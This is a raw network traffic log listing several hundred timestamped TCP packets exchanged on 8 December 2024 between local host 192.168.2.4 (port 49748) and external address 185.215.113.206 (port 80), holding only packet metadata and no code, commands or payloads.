Dec 8, 2024 19:52:28.281193972 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.281291008 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.281328917 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.281873941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.281908989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.282006979 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.282042027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.282700062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.282740116 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.282819986 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.282856941 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.283502102 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.283540010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.283638954 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.283674955 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.284326077 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.284363031 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.284573078 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.284606934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.285105944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.285146952 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.285211086 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.285247087 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.286012888 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.286053896 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.286108971 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.286143064 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.286747932 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.286787987 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.286865950 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.286901951 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.287543058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.287580013 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.287642002 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.287683964 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.288373947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.288412094 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.288422108 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.288456917 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.289246082 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.289285898 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.289314032 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.289350986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.290112972 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.290152073 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.290276051 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.290306091 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.290920019 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.290962934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.291162014 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.291201115 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.291618109 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.291656017 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.291683912 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.291723967 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.292411089 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.292454958 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.442121029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.442147017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.442305088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.442428112 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.442487001 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.442517996 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.442564011 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.443219900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.443269968 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.443304062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.443350077 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.443983078 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.444027901 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.444152117 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.444195986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.444813967 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.444858074 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.444928885 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.444972992 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.445657015 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.445708990 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.445740938 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.445785046 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.446449995 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.446496964 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.446527004 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.446567059 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.447319031 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.447361946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.447392941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.447432041 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.448050976 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.448096037 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.448159933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.448199987 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.448870897 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.448916912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.448980093 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.449018002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.449038982 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.449675083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.449722052 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.449778080 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.449820042 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.450491905 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.450537920 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.450596094 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.450638056 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.451354027 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.451406002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.451412916 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.451448917 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.452169895 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.452224970 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.452250004 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.452292919 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.452929974 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.452976942 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.453030109 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.453075886 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.453748941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.453792095 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.453906059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.453953028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.454583883 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.454632044 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.454660892 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.454699039 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.455360889 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.455408096 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.455481052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.455528975 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.456166029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.456212044 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.456216097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.456247091 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.456984043 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.457031012 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.457046032 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.457087994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.457788944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.457839012 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.457901001 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.457946062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.458621025 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.458657980 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.458676100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.458694935 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.459435940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.459484100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.459518909 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.459556103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.460242987 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.460280895 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.460295916 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.460320950 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.461072922 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.461093903 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.461128950 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.461141109 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.461941004 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.461988926 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.462019920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.462059021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.462721109 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.462805033 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.462814093 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.462858915 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.463485003 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.463530064 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.463668108 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.463706970 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.464364052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.464400053 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.464581966 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.464622974 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.465135098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.465181112 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.465241909 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.465281010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.466001987 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.466042995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.466128111 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.466172934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.466762066 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.466806889 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.466860056 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.466897964 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.467566013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.467602015 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.467655897 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.467689991 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.468373060 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.468414068 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.468419075 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.468456030 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.469203949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.469249964 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.469278097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.469316959 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.470006943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.470050097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.470123053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.470164061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.470807076 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.470851898 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.470905066 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.470943928 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.471638918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.471694946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.471725941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.471769094 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.472450972 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.472502947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.472534895 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.472568989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.473308086 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.473354101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.473376989 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.473417997 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.474118948 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.474184036 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.474195004 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.474235058 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.474905968 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.474951982 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.475014925 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.475056887 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.475729942 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.475780010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.475831985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.475869894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.476521969 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.476582050 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.476654053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.476696014 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.477334023 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.477381945 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.477463007 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.477504969 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.478125095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.478167057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.478174925 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.478213072 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.478972912 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.479017973 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.479108095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.479146957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.479741096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.479784012 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.479865074 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.479906082 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.480643988 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.480674028 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.480696917 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.480707884 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.481405973 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.481446028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.481513023 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.481554985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.482203960 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.482243061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.482291937 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.482328892 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.483062983 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.483108997 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.483187914 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.483228922 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.483829975 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.483864069 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.483879089 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.483892918 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.484638929 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.484674931 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.634078026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.634090900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.634155989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.634241104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.634289026 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.634310961 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.634351015 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.634994030 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.635112047 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.635139942 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.635163069 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.635852098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.635905027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.636045933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.636096954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.636632919 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.636684895 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.636734009 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.636771917 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.637437105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.637481928 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.637542009 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.637581110 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.638217926 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.638259888 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.638358116 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.638407946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.639183044 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.639194965 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.639234066 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.639877081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.639921904 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.639955044 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.639992952 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.640677929 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.640717030 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.640749931 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.640789032 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.641464949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.641509056 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.641581059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.641623974 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.642347097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.642442942 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.642447948 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.642482042 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.643109083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.643153906 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.643156052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.643196106 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.643986940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.644037962 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.644088030 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.644124985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.644825935 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.644850969 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.644875050 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.644886971 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.645539999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.645582914 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.645680904 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.645724058 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.646378994 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.646423101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.646481991 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.646528006 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.647172928 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.647216082 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.647360086 CET	80	49748	185.215.113.206	192.168.2.4
